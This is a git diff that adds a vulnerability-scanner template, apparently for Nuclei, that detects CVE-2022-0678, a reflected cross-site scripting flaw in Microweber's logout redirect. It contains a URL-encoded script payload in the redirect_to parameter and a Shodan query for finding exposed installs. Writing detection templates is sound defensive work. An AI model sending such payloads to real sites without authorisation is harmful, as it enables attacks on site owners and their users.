diff --git a/cves/2022/CVE-2022-0678.yaml b/cves/2022/CVE-2022-0678.yaml new file mode 100644 index 0000000000..96cb86e001 --- /dev/null +++ b/cves/2022/CVE-2022-0678.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-0678 + +info: + name: Microweber < 1.2.11- Cross-Site Scripting + author: tess + severity: medium + description: | + Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out. + reference: + - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/ + - https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg + - https://nvd.nist.gov/vuln/detail/CVE-2022-0678 + classification: + cve-id: CVE-2022-0678 + metadata: + verified: true + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2022,xss,microweber + +requests: + - method: GET + path: + - '{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '>' + - 'content="Microweber"' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 404